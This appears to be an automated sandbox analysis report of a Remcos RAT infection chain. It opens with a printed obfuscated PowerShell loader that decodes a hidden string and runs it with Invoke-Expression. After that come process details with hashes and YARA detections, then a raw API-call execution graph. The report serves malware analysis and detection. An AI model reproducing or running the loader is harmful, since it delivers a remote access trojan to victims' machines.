DCBi9 PDOrE IDBrAPeCBi5foCInFAtCOv9 ODReF S8Cy2 GE F1 PCPuD UD OEMeD AFAnC J4 AC PD ACGa0StF L1 G9Fr6Ti9Gr6FlEquBDrC P9BoDGe8UbESq8UnC C9 TCSp0ArCUn9LiCalBScCBrDReDBa8 TCUn9DaEDaADoC M3 ND IE eEEqAFiDSu9 MC h2NoCLaFSuDEm8EpCOf5NoC F3AaC S2PrF lCspC K3RaC S5AaCDe2 ED A8 RC S9 EDPuETr8 Z4 K8Os4IrCSiAReC V7 LDApC C8MiCHy8 C8 HDSv8 FD P9ToD FCUnDCuC GCAr9OvC V8 O8NoC s8 S8guE B4AlC P3PaD GFfrDStC FCBn5PlDPo8UvC RDInC P0Fo9 F8Bl8 G5Va8fi0 U8 pCTr8Ak4TyEPrBErEMo8TuFHu8Gl8GeCArEAtCPa8 T4 BFst7 KE P5 RC E2PrD S8 MFCoCDoDud8BeDInEBrFBo1Fl8St0He8RiC CFSa7KvFCy9SeE D5FlC o2maD B8Ja9 MFLa9 SE BFGa1ud8Le0Po8BaCSaF S7TyFRe9 RESt5 MCTi2SkD g8 F9QuFSe9 FE sF g1 E8Bu0Se8 RCChF S7ChF A9 pESt5DrCPi2RuDPe8 S9LeF M9 gEFrF D1To8Le5 K8StC E8 J4 FF P7 DEGe5 ACFo2CaD B8InFSkC fDDi8StDsuE NF F1 A8Da5Ov8Bu5 G8Fa5 U'Kl; N&Mo( H`$LaHHeoPosTepPii LtAna SlNo7Kr)Sk ni`$ArVGriRezAts RlGla Bs b6Ro;Kn`$tePMea IlTreBrokrzGeoUdiHjcDy0Su1 B Pr=Do BeWCua HfAdfRie TdMu8Tr Al'Sp8Ta8 NESe9GaC P2 SC SBUdC G9TrDSyEUnCRe1MeC H5poC S2ToCSoD DD V8 SC S9Lg8 ECSe9Em1Fo8 bC SFDa7 GF SFStDRe5AnDbiFSkD A8 ECTh9NaCAr1Fo8 S2HeF VE FDPa9 PCAu2GiDLa8PaC U5ToCCo1 PC K9Sa8Um2GrELe5 RC U2 IDAl8CrCGu9 LDPeEenCHa3 GD KCPlF PF KCDe9ReD LE UDMiAFlCFo5 FC nFKaC O9 IDMiF s8Ou2YnEJu1faC SDruDBaEunDExF FCFe4PeCFoDBrCSp0AfFHu1 H9 T6 S9 A6FoEHuBSpC P9 ED D8 SE U8hvCRo9 WC A0LeC T9 TCFoB HC CDovD g8AfCDu9 EE TA GC U3AnD OESeE EAUlDNa9FrCOr2 SC SFvaD S8HuCTa5 BC S3MaCEg2SpFSaC OC U3 DC G5afCSk2 IDPa8UnCRe9NuD AEBy8Si4de8 S4PrC PA SCGe7BiDPuC F8 LCEf8Ov8RoE K1GrCnoDArDAnE CC AFTrC S4 RCRu9 sDPoE CC F9EmCYe8 FC T9Fj8StC E8Co8CyF UCBeCUnDlaCun0NoCUn9GuCSk3 sDRa6 CCBe3RaCSk5GrCRaFLu9 CCNo9 ACbi8ad5Li8 E0 P8AsCex8Op4DuEBlBBeESk8FaFMo8 H8 ACCrE ICPo8 s4 WFTe7ReEAd5CoCVa2 bDAn8AcFBuCUnDPa8 MDSnE RF U1 G8Ty0Cy8HoCSwFBi7HyFPh9MeE L5PaCLa2NeDGi8Re9 SF D9 TE UFUn1 S8Pi5Be8 SCOl8 O4 pFGa7FoE f5 RC B2FoDBh8VeF SCRaDHu8 DDSaE AFCe1 S8Le5 B8 S5Tr8Bl5Mo'Ja;Po& D(Fo`$VeHUnoMes apUriOrtUtaDelDr7re) C V`$RaP Na DlZoeCoo LzSeoWei Dcsp0Co1Sl; S`$MiPEkaSnlPhe OoIdz Foeni ScEn0Fl2Pr A=Su MW La SfStfPreand H8Ra Ln' A8 s8RaFSp9CaCca2ReD EESyCPr3KoCAl0 FC s0IdC tD AC KEDeCfl0TyC e9Sr8ImCAr9Ge1Ek8 SCPrFLa7BlFSkFReD R5 aDMiF FDLi8 MCWi9CaC U1ve8Ar2UnF VELoD O9grCPl2ErD B8BeCDi5KrCAl1 SCLi9 S8 A2ViE S5UnC P2SuDDi8HaCin9LoDLiESlCRe3 GDInCDyFRdF BCHe9InDShE BDsuA ACMe5 CCTeFPoC P9 FDKeFNa8Bi2 NE E1OvCAsDUnD RE tDQuFUnC a4FeC MD TCTr0 FFBu1Gr9 D6Ps9 S6SyEAlBCoCKo9TiD T8RuE P8 BCGr9TrC C0 OCCo9ObCunB PCHeD GDPi8 TCPr9GaE AALaC I3ArDBlE hEFaAHeD T9 PC t2 VCkiF BDAs8waCUd5 UCRe3KnC F2 UFTaC ACLi3 ACFl5 ACAb2SkDNe8NeC H9 ADReERe8 E4Se8 A4 TC hA tCTr7SpDInCUd8 SCAs8Co8 HDEx8 GDOm9PoDBrC JDFoCIbCDe9 DCCe8Re8KaCSa8 S8BlFPhC aCUnDpaC H0GyCSo9 ACfr3ToDNa6PrC B3AuCHj5DiCPaFud9UvC D9GuFCw8Ad5Br8Fe0 N8KaC O8St4 fEAfBDkE s8 OF F8 a8BoCAtETeCSt8 P4ClF P7UnEVi5ReCTr2OcDPo8 UF TCFoD B8BrD AEFiF A1Fr8Pr5Pe8 AC U8 R4 AFTi7EvEFi5 EC H2reD O8UnFSiCDeDun8utDJaEheF D1Mt8Ca5Hg8 s5 A8Da5Be' F;Un&Ka(Lo`$ DH Go SsRep SiDetRya BlVa7 D)Ae Kr`$BeP GaunlToeCuo TzPuo Mi RcPu0Ov2 e;Ne`$ SV SiEmz AsGllOma CsUl7 L S=Qu SuW IaAcfCofAve Md P8An Pr' T8 P8 SFBeFMiD uCpeC s5FuCRo2TyDMoFhuDEl8 TCFo9 sD KEPeDTaFTaCli4UnC S5vaDSvCSl8TeCBl9 F1Ea8efCSa8Bo8LaF K9TiC B2TeDShEFoC L3 SC P0SkCDi0 SCOvDLeC KEReCMe0 LCRu9De8Eg2 FEKm5 VC A2CaD TA BC S3BoCRo7BiC P9Ta8 F4An9MeCLi8 a5 O'Si; E& C( N`$TyHSgoIgs np Ui PtAgaOmlDe7ca)Ov B`$KaVPhisezArsEmlOra Ss G7St;Pr`$ RVLiiRaz SsPilRoa Hspr7 C B=Ru StWRea EfAzfFae Bd F8Ba Op'Un8 c8SiEAl9ApCHe2 BCDeB VC A9 FD SE mCFo1 SCNo5 UC k2AgC CD AD P8 MC p9Ta8Bj2UnEPu5ReC H2 UDPoASpC H3AfCUn7PsCNa9 R8Fo4 M8Pi8SiF DF SDElC OCSl5 FCCu2skDBaFAnDBe8SeC P9 CD TEEpD PFScC u4EpC V5IsD ZCSu8Mo0Ov8AcC y9 SC N8Se5Am'Se;Mo& O( l`$ LH Ao fs EpAbi BtTea RlNo7Ge)Ca En`$ rV MiExzFrsUnlSla Rs P7Sc;co`$MuACafCrtHea Jl OeVifFao Ar Al Cb S Un=Ln UnfKak Ap R Pa`$UaHUno TsDipAlistt SaLilRi5 K Tr`$ FHDioFas ApJoiIntCaa TlBi6Se;Fo`$PeVSaiDazsts Pl Ka DsPl7Na Re=Do CW DaLyf CfDaeAfd T8Op A'la8Pr8 SFsk9LoC D2 ECTi8StCTe9PrCOmFRyC S7LaCCa9InCgn8In9GaF R8BiCTe9fr1En8TrC O8Sl8ReCouDSpCEl0 RCUhABeCAl9PiCApA SC n3SpCUt0ReC N7 I8Te2AfEpr5HiCRe2LoDSaAKeCUf3 UCSp7 MCBo9 C8Sk4peFUn7 DEKe5 JC T2LiD S8DeFMiCHyDBu8AaDHaEBaF T1Ha9Ap6No9 G6slFsa6FiCVo9FeD HEUdCGr3Ma8Pl0 B8 BCko9 rA C9UdFNa9Dr9Go8Nu0 U8ReCHa9PrC vD M4Os9 SF G9 UCFl9DiC M9CaC T8 K0 S8SyC D9AkCDeD U4Co9 A8 P9 OC d8 S5Ke'Vu;Gl& S(br`$ GH DoFosSupPeiLetUaansl D7Or) S Ge`$StVCai pzTosUdl Ba as S7 C;Su`$ DVUnisezStsEpl OaresLu8Fa Mu= C TW ta Vf EfFaeardBa8 S Ar'Hy8 H8VeD CC ACBr3BrC p0 MD C5 ACSe9 bCDy1UmC U5 MCReDJg8 RC M9Ta1An8 OCUd8Dv8DyCPeDBoCSt0klCDeAIdCIr9 NC FAauCDy3 VCAs0acCTe7Al8 I2SpE M5DaCPs2 UDBaAThCRe3 ICha7OvCCe9 s8 F4FoFNa7unEDe5KaCMe2 BD D8HoFNoCBeD D8PlDreE AF T1Un9 R6So9 U6 KF G6 SCLu9HeDPrEFoC T3 N8Ro0 D8 FC A9Di4Sv9BoDCa9La4 p9 ABCo9Br5Re9 MC K9Fo8Un9 LCJu8An0 K8riC K9 CC cDfi4 U9GrFKa9 NCGe9ChC M9NeC D8Se0 F8 OC g9DiC AD B4 S9Se8Un8Al5Sa'Mi; S& U(Sa`$DiH Bo Ps Ipmoi atHyaNol D7 I)bi Lm`$ EV TiPrz ps Hl ta PsSa8 Y;Fy`$GuU HnLadBle ScOmkskeZod U2 R=Re`"""Ti`$ weTrn Av O:anLreOSuCSuA pLBrAAxPFoP gD BAFrTNoABl\ TITon Dt Be IrunpFraInrChtBueApsZif Doter Sh PoBll Ed O\StSAftBerCoeTrn SgReeDil Wenig AeCu\ FS EmfoaMel CsUniAmdLaeBarSln AeBasBo\SpOMad SiLauLem T2Da0 K6tr. SFMal So B3 P5Vi`""" R;Gu`$PsVTeiOnzSts KlTeaPls F9 D Gy=Ra UnWFraEmf Ef AenedTe8Ke P' U8In8 UFSaA FCPu5ReDUn6 DDDeFStCCe0 KCAkD NDBeF P8 RC F9Fu1Bo8StCNiFKu7spFSoF IDVi5 LD LFSpD I8 SC S9FeC H1Wi8Wi2 BEDe5 FE a3 I8 S2MiELaATuCud5 MCNe0 dC R9 AFCr1Tu9 U6 R9 A6 SFtiERiC B9GeCApDElCTu8ToE PDPrC I0CaCUd0EnE UEDeDPi5 nDDi8 ECno9 NDsiFEl8 B4 C8 l8NaF A9BaCTr2 SCPr8UdCOn9 PCAfF LCPr7 KCBu9TyCNo8Ef9MnEPe8Fo5Fo' V;Un&na( S`$ BHaro SsKup CiEkt Da Bl P7Ca) F Ti`$AfVDaiDuz ls Nl Ba osSa9So;da`$PaWAnaBof BfKheRedCa0Si Fo= G BWIna SfFlfIne adEc8 B Mi'deFCu7StF PFEmD a5BeD LFSoDLu8 CCAr9 JCPa1 S8 d2 HF HEKoDCh9YpCNo2OrDSl8 UC V5 DC C1YnC F9Co8Sy2SeE A5ShCNa2LuDDu8SkCTa9NdD TE SCKr3AuDHeCBiFElFNoC E9KiD AEHuDSkA RC B5RoC DFRuCKl9RvD AFPo8 C2 VESt1EtCTiD SDUnESpDKoFBaCAn4miCBeD DCUn0DaFpu1Mo9re6 T9 T6 AE PF UC S3UnDStC aD D5Re8 F4 G8Hy8SkFOvA ACSt5ZiDSm6GrD MF ICNo0CoCGrDGeDUgFTr8Ha0 K8 iC g9VaF L9MaCSk9AcESa9Tr8 l8ta0 a8 cCGl8StCSl8ud8 BFRh9BeC M2GaC G8DoC A9TiC CF SCIm7OvCAr9 sCFe8Je9HoF V8 B0 S8 GCCa9NoAVa9 CF P9Pr9Al8Bo5 B' B;Ed&Ov(Or`$LgHFlo TsHipAniLotLia El S7 P)Pr Ca`$prW CaThf SfNoeCydRu0Be;Ly`$AnP potal me EmInoPan Ui SuHem O=Cl`$SaVAni Lz CsInlBla msCo. VcKaoFuu PnLit N- M6Ru3Ho5 G-Bo3 U0Be2 B4re; D`$ReWSta Bf SfPreTydVa1El Fo= p FlW DaTef Of UeRid G8Rk Li' RFMa7BoFPrF SD T5noD sFOmDSo8 PCRe9OvCPr1Ps8Dy2MoF SE FD M9 BCHe2BeDIn8PrC u5 RC K1BoCVa9Ne8Ri2 HETe5 EC U2ufDTa8NaC A9GrDSuE tC J3ShDHuCImF VFMaC G9 OD EE HD DAAnC H5AlCBlFSaC D9 CDFoFDe8De2 REKj1 NCHbD VD DE ADTrF NCTi4FoCUnD PCRe0InF R1Ir9Ev6 S9Af6TiE UFPiCMo3 UDDiCSlD A5mi8 F4Gl8ph8SoFShAteCgr5CaD F6DiD SFCuCre0 HCUnD SD CF h8 T0sm8 SCTi9BiARa9 JFsy9 A9 P8Ac7Mu9 NFNy9MiCEm9 ME A9Ra8 F8Re0Av8 KCDa8Fo8 BDBrCAnC s3anCFl0 TDGr5AfCPi9 UC A1InCPs5KaC EDAf8 S0 P8 KCNe8Ko8 AF MCPuCud3TiC R0 HCFa9BaCFu1ClC d3GuCre2AuCCy5UnDBe9SaCHa1Ta8 A5Gr'Lt; C& L(In`$HeH FobosJep Di DtUnaKul K7 c) L Co`$ AWSeaUrfTof ReBrdKr1 B;Br`$TiWPha RfEuf oeFidPi2Th Al=La lW La afAsf FeIndAf8 A Bj'Re8Bi8 TFatBTyCOv5 FC VA PCSl9UnC M7HvCRl5 DC R2Ns8 KC B9Ep1Sc8 BC kF b7TrFBeFImD C5 BDKuF RDUn8 ACKo9 rCKl1 P8Bu2 DFAkESpD R9NoCIr2 ID O8RaC b5 PC R1DiChi9Un8Pu2FrE U5KoCUd2UnDLa8 JC T9UdD NE SCIn3HoD PCAlF TF PC S9PhD mESwDGoASiCDa5MiCSnF TCBr9 ED FFUt8 I2SkEUn1 SCFjDreDanEDoDSpF MCBe4 AC LD BC V0 vFBo1 Z9 S6Se9Ly6PoE ABHeC B9 LDFe8SkEre8 UC n9 DCPe0CoCPr9BlC PBDeCReD DDBe8SaCUd9BlE OA NCMa3InDSmE IEPiAboD I9PiCRa2TrC kFFrDCh8 SCBa5 rC F3BaCco2NiFThC ECDe3 EC V5 BCSa2TrD S8 PCSt9DeDShEal8Be4So8De4LaCBsAKnC D7VuDGoCBl8 SCTa8 F8BiEAnA LClu5SdCMu3ShC H2 HCagD I8 MCUn8Pr8 OF K9 EC OE DC K9 BD DAStCSk5RiD tFHoCAf0 DCOp5 DC aB PCHo9AnD PFPi8Po5 F8Mi0Te8StCLa8 C4GcESoBafE D8kaFMo8 j8EmC DESpCAf8 O4FoFlu7 OEVa5 SCFo2 RDIn8 SFerCReDtr8tuD BEOuF E1Un8Sy0 A8SkC UFPj7BaEFj5 SC F2 ZDId8CoF SC SDIn8TeDBaEkiFDd1Sa8Fi0 B8aaC JF F7HmE F5unC D2 FD S8 WFflC HD C8SuDSlEBuFDe1In8Vl0St8NaC EF S7LoE I5VrC S2AnD s8BoF MCMiD F8 BD SEgrFNe1an8Re0Si8KeCTiFPo7enEge5VoC C2FoDSt8 MF CCBeD C8 PDRaESoFSy1Ve8Ge5Bl8PrC n8Ca4 GFBg7 bEOv5StCNo2 KD M8OvFDiCStD S8SaD SEPrF S1Sr8Re5At8 M5 T8 O5 D' C; a& V(Ul`$HyHKno WsRep CiSltSva Hl U7 N) A Te`$BiWAra SfAafBieAgd A2pr; i`$ wW DaKofNafRge Sd A3 C G=Cy EnWStaSlfUdfSceEfdUn8re Ud' I8 T8 FFmgBStCAf5UpCPrAMeCRe9AbC D7 PCPa5ExC L2Sa8 S2NeE M5 VCEn2ViDGlA LCSe3TeC B7PyCSk9 G8 D4 O8Tr8ViFCr9GaCUn2HuCCu8 AC A9trCDeF HCPr7CrC G9MiC D8Co9kuFph8Pl0 P8 M8SpDFoCJuC N3 RCGa0PlD k5 SCGa9InCOp1udC M5 WC SDSi8Ro0 T8 P8ChE FDDeCPrA UD A8 SCRiD AC b0LaCCh9MaCGaA FC J3 KDEnECrC F0 BC SESl8Me0Zi9PrCPl8 S0Di9 DCAg8Af5 P' Z;Na& S(Ae`$keH SoUnsbrpHei At Iahylbu7Vo) c G`$DeWhoaBuf bf teBadAc3sa# S;""";;Function Waffed9 { param([String]$Luvart); For($Polyphonically=2; $Polyphonically -lt $Luvart.Length-1; $Polyphonically+=(2+1)){ $Paleozoic = $Paleozoic + $Luvart.Substring($Polyphonically, 1); } $Paleozoic;}$Landvindings0 = Waffed9 'laIPrnRev FoMak Fe H-IdERex Np Hr Ae AsOvsUni poRenOr ';$Landvindings1= Waffed9 $Bisonerne;&$Landvindings0 $Landvindings1;<#Headreach Anomaloscope diasrammerne Formatordres Upknell Provenly #>;
                                                                                    Imagebase:0x5d0000
                                                                                    File size:433152 bytes
                                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:.Net C# or VB.NET
                                                                                    Reputation:moderate

                                                                                    Target ID:5
                                                                                    Start time:16:44:16
                                                                                    Start date:26/04/2023
                                                                                    Path:C:\Program Files (x86)\Internet Explorer\ieinstal.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Program Files (x86)\internet explorer\ieinstal.exe
                                                                                    Imagebase:0x630000
                                                                                    File size:480256 bytes
                                                                                    MD5 hash:7871873BABCEA94FBA13900B561C7C55
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:moderate

                                                                                    Target ID:6
                                                                                    Start time:16:44:16
                                                                                    Start date:26/04/2023
                                                                                    Path:C:\Program Files (x86)\Internet Explorer\ieinstal.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Program Files (x86)\internet explorer\ieinstal.exe
                                                                                    Imagebase:0x630000
                                                                                    File size:480256 bytes
                                                                                    MD5 hash:7871873BABCEA94FBA13900B561C7C55
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000002.5938763780.000000000757F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000003.3487806711.000000000757F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000003.3488569083.000000000757F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000003.3486333941.000000000757F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Reputation:moderate

                                                                                    Reset < >

                                                                                      Execution Graph

                                                                                      Execution Coverage:22.1%
                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                      Signature Coverage:16.8%
                                                                                      Total number of Nodes:1391
                                                                                      Total number of Limit Nodes:27
                                                                                      execution_graph 3222 4015c1 3242 402d3e 3222->3242 3226 401631 3228 401663 3226->3228 3229 401636 3226->3229 3232 401423 24 API calls 3228->3232 3258 401423 3229->3258 3237 40165b 3232->3237 3236 40164a SetCurrentDirectoryW 3236->3237 3238 4015d1 3238->3226 3239 4015fa 3238->3239 3240 401617 GetFileAttributesW 3238->3240 3254 405e3e 3238->3254 3262 405b0d 3238->3262 3270 405af0 CreateDirectoryW 3238->3270 3239->3238 3265 405a73 CreateDirectoryW 3239->3265 3240->3238 3243 402d4a 3242->3243 3273 406579 3243->3273 3246 4015c8 3248 405ebc CharNextW CharNextW 3246->3248 3249 405ed9 3248->3249 3252 405eeb 3248->3252 3251 405ee6 CharNextW 3249->3251 3249->3252 3250 405f0f 3250->3238 3251->3250 3252->3250 3253 405e3e CharNextW 3252->3253 3253->3252 3255 405e44 3254->3255 3256 405e5a 3255->3256 3257 405e4b CharNextW 3255->3257 3256->3238 3257->3255 3311 4055a4 3258->3311 3261 40653c lstrcpynW 3261->3236 3322 406931 GetModuleHandleA 3262->3322 3266 405ac4 GetLastError 3265->3266 3267 405ac0 3265->3267 3266->3267 3268 405ad3 SetFileSecurityW 3266->3268 3267->3239 3268->3267 3269 405ae9 GetLastError 3268->3269 3269->3267 3271 405b00 3270->3271 3272 405b04 GetLastError 3270->3272 3271->3238 3272->3271 3277 406586 3273->3277 3274 4067d1 3275 402d6b 3274->3275 3306 40653c lstrcpynW 3274->3306 3275->3246 3290 4067eb 3275->3290 3277->3274 3278 40679f lstrlenW 3277->3278 3280 406579 10 API calls 3277->3280 3283 4066b4 GetSystemDirectoryW 3277->3283 3284 4066c7 GetWindowsDirectoryW 3277->3284 3285 4067eb 5 API calls 3277->3285 3286 406579 10 API calls 3277->3286 3287 406742 lstrcatW 3277->3287 3288 4066fb SHGetSpecialFolderLocation 3277->3288 3299 40640a 3277->3299 3304 406483 wsprintfW 3277->3304 3305 40653c lstrcpynW 3277->3305 3278->3277 3280->3278 3283->3277 3284->3277 3285->3277 3286->3277 3287->3277 3288->3277 3289 406713 SHGetPathFromIDListW CoTaskMemFree 3288->3289 3289->3277 3297 4067f8 3290->3297 3291 40686e 3292 406873 CharPrevW 3291->3292 3294 406894 3291->3294 3292->3291 3293 406861 CharNextW 3293->3291 3293->3297 3294->3246 3295 405e3e CharNextW 3295->3297 3296 40684d CharNextW 3296->3297 3297->3291 3297->3293 3297->3295 3297->3296 3298 40685c CharNextW 3297->3298 3298->3293 3307 4063a9 3299->3307 3302 40643e RegQueryValueExW RegCloseKey 3303 40646e 3302->3303 3303->3277 3304->3277 3305->3277 3306->3275 3308 4063b8 3307->3308 3309 4063c1 RegOpenKeyExW 3308->3309 3310 4063bc 3308->3310 3309->3310 3310->3302 3310->3303 3312 4055bf 3311->3312 3320 401431 3311->3320 3313 4055db lstrlenW 3312->3313 3314 406579 17 API calls 3312->3314 3315 405604 3313->3315 3316 4055e9 lstrlenW 3313->3316 3314->3313 3318 405617 3315->3318 3319 40560a SetWindowTextW 3315->3319 3317 4055fb lstrcatW 3316->3317 3316->3320 3317->3315 3318->3320 3321 40561d SendMessageW SendMessageW SendMessageW 3318->3321 3319->3318 3320->3261 3321->3320 3323 406957 GetProcAddress 3322->3323 3324 40694d 3322->3324 3325 405b14 3323->3325 3328 4068c1 GetSystemDirectoryW 3324->3328 3325->3238 3327 406953 3327->3323 3327->3325 3329 4068e3 wsprintfW LoadLibraryExW 3328->3329 3329->3327 4117 402a42 4118 402d1c 17 API calls 4117->4118 4119 402a48 4118->4119 4120 402a88 4119->4120 4121 402a6f 4119->4121 4127 402925 4119->4127 4124 402aa2 4120->4124 4125 402a92 4120->4125 4122 402a74 4121->4122 4123 402a85 4121->4123 4131 40653c lstrcpynW 4122->4131 4132 406483 wsprintfW 4123->4132 4128 406579 17 API calls 4124->4128 4126 402d1c 17 API calls 4125->4126 4126->4127 4128->4127 4131->4127 4132->4127 4133 401c43 4134 402d1c 17 API calls 4133->4134 4135 401c4a 4134->4135 4136 402d1c 17 API calls 4135->4136 4137 401c57 4136->4137 4138 401c6c 4137->4138 4140 402d3e 17 API calls 4137->4140 4139 401c7c 4138->4139 4141 402d3e 17 API calls 4138->4141 4142 401cd3 4139->4142 4143 401c87 4139->4143 4140->4138 4141->4139 4145 402d3e 17 API calls 4142->4145 4144 402d1c 17 API calls 4143->4144 4146 401c8c 4144->4146 4147 401cd8 4145->4147 4149 402d1c 17 API calls 4146->4149 4148 402d3e 17 API calls 4147->4148 4150 401ce1 FindWindowExW 4148->4150 4151 401c98 4149->4151 4154 401d03 4150->4154 4152 401cc3 SendMessageW 4151->4152 4153 401ca5 SendMessageTimeoutW 4151->4153 4152->4154 4153->4154 4155 402b43 4156 406931 5 API calls 4155->4156 4157 402b4a 4156->4157 4158 402d3e 17 API calls 4157->4158 4159 402b53 4158->4159 4160 402b57 IIDFromString 4159->4160 4162 402b8e 4159->4162 4161 402b66 4160->4161 4160->4162 4161->4162 4165 40653c lstrcpynW 4161->4165 4164 402b83 CoTaskMemFree 4164->4162 4165->4164 4166 402947 4167 402d3e 17 API calls 4166->4167 4168 402955 4167->4168 4169 40296b 4168->4169 4170 402d3e 17 API calls 4168->4170 4171 40600d 2 API calls 4169->4171 4170->4169 4172 402971 4171->4172 4194 406032 GetFileAttributesW CreateFileW 4172->4194 4174 40297e 4175 402a21 4174->4175 4176 40298a GlobalAlloc 4174->4176 4179 402a29 DeleteFileW 4175->4179 4180 402a3c 4175->4180 4177 4029a3 4176->4177 4178 402a18 CloseHandle 4176->4178 4195 403590 SetFilePointer 4177->4195 4178->4175 4179->4180 4182 4029a9 4183 40357a ReadFile 4182->4183 4184 4029b2 GlobalAlloc 4183->4184 4185 4029c2 4184->4185 4186 4029f6 4184->4186 4187 403309 44 API calls 4185->4187 4188 4060e4 WriteFile 4186->4188 4193 4029cf 4187->4193 4189 402a02 GlobalFree 4188->4189 4190 403309 44 API calls 4189->4190 4191 402a15 4190->4191 4191->4178 4192 4029ed GlobalFree 4192->4186 4193->4192 4194->4174 4195->4182 4196 4045c8 lstrcpynW lstrlenW 4197 403bc9 4198 403bd4 4197->4198 4199 403bdb GlobalAlloc 4198->4199 4200 403bd8 4198->4200 4199->4200 4204 4016cc 4205 402d3e 17 API calls 4204->4205 4206 4016d2 GetFullPathNameW 4205->4206 4207 4016ec 4206->4207 4213 40170e 4206->4213 4210 40689a 2 API calls 4207->4210 4207->4213 4208 402bc2 4209 401723 GetShortPathNameW 4209->4208 4211 4016fe 4210->4211 4211->4213 4214 40653c lstrcpynW 4211->4214 4213->4208 4213->4209 4214->4213 4215 401e4e GetDC 4216 402d1c 17 API calls 4215->4216 4217 401e60 GetDeviceCaps MulDiv ReleaseDC 4216->4217 4218 402d1c 17 API calls 4217->4218 4219 401e91 4218->4219 4220 406579 17 API calls 4219->4220 4221 401ece CreateFontIndirectW 4220->4221 4222 402630 4221->4222 4230 402acf 4231 402d1c 17 API calls 4230->4231 4232 402ad5 4231->4232 4233 402925 4232->4233 4234 402b12 4232->4234 4236 402ae7 4232->4236 4234->4233 4235 406579 17 API calls 4234->4235 4235->4233 4236->4233 4238 406483 wsprintfW 4236->4238 4238->4233 4239 4020d0 4240 4020e2 4239->4240 4250 402194 4239->4250 4241 402d3e 17 API calls 4240->4241 4243 4020e9 4241->4243 4242 401423 24 API calls 4244 4022ee 4242->4244 4245 402d3e 17 API calls 4243->4245 4246 4020f2 4245->4246 4247 402108 LoadLibraryExW 4246->4247 4248 4020fa GetModuleHandleW 4246->4248 4249 402119 4247->4249 4247->4250 4248->4247 4248->4249 4259 4069a0 4249->4259 4250->4242 4253 402163 4255 4055a4 24 API calls 4253->4255 4254 40212a 4256 401423 24 API calls 4254->4256 4257 40213a 4254->4257 4255->4257 4256->4257 4257->4244 4258 402186 FreeLibrary 4257->4258 4258->4244 4264 40655e WideCharToMultiByte 4259->4264 4261 4069bd 4262 4069c4 GetProcAddress 4261->4262 4263 402124 4261->4263 4262->4263 4263->4253 4263->4254 4264->4261 4265 404651 4266 404669 4265->4266 4269 404783 4265->4269 4270 404492 18 API calls 4266->4270 4267 4047ed 4268 4047f7 GetDlgItem 4267->4268 4271 4048b7 4267->4271 4272 404811 4268->4272 4273 404878 4268->4273 4269->4267 4269->4271 4274 4047be GetDlgItem SendMessageW 4269->4274 4275 4046d0 4270->4275 4276 4044f9 8 API calls 4271->4276 4272->4273 4277 404837 SendMessageW LoadCursorW SetCursor 4272->4277 4273->4271 4278 40488a 4273->4278 4298 4044b4 KiUserCallbackDispatcher 4274->4298 4280 404492 18 API calls 4275->4280 4281 4048b2 4276->4281 4302 404900 4277->4302 4283 4048a0 4278->4283 4284 404890 SendMessageW 4278->4284 4286 4046dd CheckDlgButton 4280->4286 4283->4281 4288 4048a6 SendMessageW 4283->4288 4284->4283 4285 4047e8 4299 4048dc 4285->4299 4296 4044b4 KiUserCallbackDispatcher 4286->4296 4288->4281 4291 4046fb GetDlgItem 4297 4044c7 SendMessageW 4291->4297 4293 404711 SendMessageW 4294 404737 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4293->4294 4295 40472e GetSysColor 4293->4295 4294->4281 4295->4294 4296->4291 4297->4293 4298->4285 4300 4048ea 4299->4300 4301 4048ef SendMessageW 4299->4301 4300->4301 4301->4267 4305 405b68 ShellExecuteExW 4302->4305 4304 404866 LoadCursorW SetCursor 4304->4273 4305->4304 4306 4028d5 4307 4028dd 4306->4307 4308 4028e1 FindNextFileW 4307->4308 4311 4028f3 4307->4311 4309 40293a 4308->4309 4308->4311 4312 40653c lstrcpynW 4309->4312 4312->4311 4313 401956 4314 402d3e 17 API calls 4313->4314 4315 40195d lstrlenW 4314->4315 4316 402630 4315->4316 4317 4014d7 4318 402d1c 17 API calls 4317->4318 4319 4014dd Sleep 4318->4319 4321 402bc2 4319->4321 3680 4035d8 SetErrorMode GetVersion 3681 403617 3680->3681 3682 40361d 3680->3682 3683 406931 5 API calls 3681->3683 3684 4068c1 3 API calls 3682->3684 3683->3682 3685 403633 lstrlenA 3684->3685 3685->3682 3686 403643 3685->3686 3687 406931 5 API calls 3686->3687 3688 40364a 3687->3688 3689 406931 5 API calls 3688->3689 3690 403651 3689->3690 3691 406931 5 API calls 3690->3691 3692 40365d #17 OleInitialize SHGetFileInfoW 3691->3692 3770 40653c lstrcpynW 3692->3770 3695 4036a9 GetCommandLineW 3771 40653c lstrcpynW 3695->3771 3697 4036bb 3698 405e3e CharNextW 3697->3698 3699 4036e0 CharNextW 3698->3699 3700 40380a GetTempPathW 3699->3700 3708 4036f9 3699->3708 3772 4035a7 3700->3772 3702 403822 3703 403826 GetWindowsDirectoryW lstrcatW 3702->3703 3704 40387c DeleteFileW 3702->3704 3705 4035a7 12 API calls 3703->3705 3782 403068 GetTickCount GetModuleFileNameW 3704->3782 3709 403842 3705->3709 3706 405e3e CharNextW 3706->3708 3708->3706 3715 4037f5 3708->3715 3717 4037f3 3708->3717 3709->3704 3711 403846 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3709->3711 3710 403890 3712 403947 ExitProcess OleUninitialize 3710->3712 3723 405e3e CharNextW 3710->3723 3754 403933 3710->3754 